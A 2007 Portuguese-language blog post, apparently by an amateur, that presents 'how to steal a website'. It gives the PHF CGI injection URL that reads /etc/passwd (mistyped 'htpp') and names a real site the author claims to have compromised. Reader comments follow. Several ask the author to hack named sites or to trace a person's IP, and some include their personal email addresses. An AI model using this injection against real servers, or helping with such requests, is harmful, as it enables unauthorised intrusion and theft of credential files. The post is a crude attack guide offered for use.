sexta-feira, 9 de novembro de 2007

como roubar um site

essa e maneira mas facio de rouba um site
mas nao pense so por que e fasio tem muita chace
vc so tem de 30% a 50% de chace e muito pouco vc tem que
rouba um site fraco nao queira rouba site de orkut
de msn que nao vai dar nao
ok vc tem rouba site como o site de calsinhapreta
um dos sites que eu ja roubei como o do calsinhapreta
www.calsinhapreta.com.br
vc vai fazer a seginte coisa vai coloca
o site que vc quer rouba no
htpp://***********/cgi-bin/phf?qalias=x%0a/bin/cat%20/etc/passwd
na estrelinha vc coloca o site ex:htpp://www.calsinhapreta.com.br/cgi-bin/phf?qalias=x%0a/bin/cat%20/etc/passwd
nao pense que vc e um racker so por que aprendeu a fazer isso nao
so estou emcinando conhecimento nao e crime vlw...

15 comentários:

Unknown disse...

muito legal!!!
so que eu nao tem abilidades pra ser um racker!!!rsrsrsrs
preciso de ajuda de um pra rsolver um problema!!!se puder me ajudar entre em contato no meu msn simone25_gsm@hotmail.com
grata!!!!

00cow disse...

se vc tiver alguma coisa relacionado a vnc da um toque eu tenho umas senha
valeuuuuuu osama_00cow@msn.com

maltinhagostoso disse...

eu nao consegui roubar esse site !!
ele é pekeno

www.know.vai.la

v se vc consegue!

DA CRUZ disse...

oi! não consegui,fazer esse procedimento,mas se quiser me dar uma ajuda seria muito grato:

100vergonha@windowslive.com
atenciosamente,Mario da cruz.

carlos disse...

me ajuda, esse site(www.bonete.com.br)era para ser usado para as pessouas conhecer o bonete,mas um cara fez o site o problema é que mostra só a pousada dele

por favor vc consegue pegar esse site para mim

é serio,obrigado.
gostozao_surf@hotmail.com

Unknown disse...

o Rouba esse site aqui para min Por favor e Rapido so para dar a um cretino o que ele merece www.muevl.vai.la Vlw's

Unknown disse...

to querendo aprender algumas tecnicas ...tudo q vc puder m ensinar sobre senha e virus....m da essa força ai......
meu msn :brunooliveira_2525@hotmail.com

felipeimagina disse...

pow voce tenta hackear esse site pra mim..
voce poderia mi ensinar como roubar um site é www.narutoplayers.com
meu MSN é > feliipe_imagina22@hotmail.com
podem mi ajudar??

valeuu..

Anônimo disse...

o cara não entendi como assim colocar estrelinhas no site aonde

Hendrick disse...

Cara esse negocio ai de roubar site num da naum a FireFox e a Opera fala q da um erro e num vai explica melhor vlws'

Hendrick disse...

Cara issu e beim legal mais eu num consigui naum explika melhor vlws'

UNADE disse...

Ah...vão morder seus pais na bunda! o idiota além de não saber escrever, cometeu um erro primário de digitação no pseudo-comando hacker!

UNADE disse...

Ah...vão morder seus pais na bunda! o idiota além de não saber escrever, cometeu um erro primário de digitação no pseudo-comando hacker!

Ainda estou aqui... disse...

Preciso descobrir o IP de uma pessoa q está na minha relação de amigos do hotmail, só q a ela nunca se identifica, nao diz direito o q faz, as vezes diz morar um bairro e depois n'outro. Num dado dia diz tem tantos anos e muda constantemente. Parece mais alguem qerendo tirar informações ou vigiar-me de algum modo. Ela mostra apenas uma fotoimagem ou seja, uma figura qq de um gato, cachorro, etc. Pior de tudo q atrapalha minha relação com minha namorada. Os sites de busca de IPs sao todos furados. Uns mostram uma cidade do país "x" outros mostram cidades "y" outros mostram cidades "z" e nenhum dá a localização correta. Parecem apenas dar o nome do servidor e nao aonde está localizado o PC de origem do email. Ajude-me. Grato.

RoDriGueS_xD disse...

E aew gostaria de ter algumas informações a mais sobre softwares e invasões, motivo, estou cursando analista de sistemas e meu professor me falou q eu deviria m aprofundar mais no asunto hackers, m matriculei na escola hackers, mas até agora não estou compreendendo muito bem se vc poder m ajudat em algumas duvidas e dicas em geral e aprofundadas estou pronto para lhe recompesar em dinheiro no valor de um professor online na categoria hackers, obrigado e desde jah agradeço.
meu msn fake > patto_hiphop@hotmail.com :P

depois de conversarmos e eu ter certeza q vc tem conhecimentos q podem m ajudar em minha profionalização de darei o meu email original e de reconpensarei em dinheiro, conforme vai o decorrer das aulas.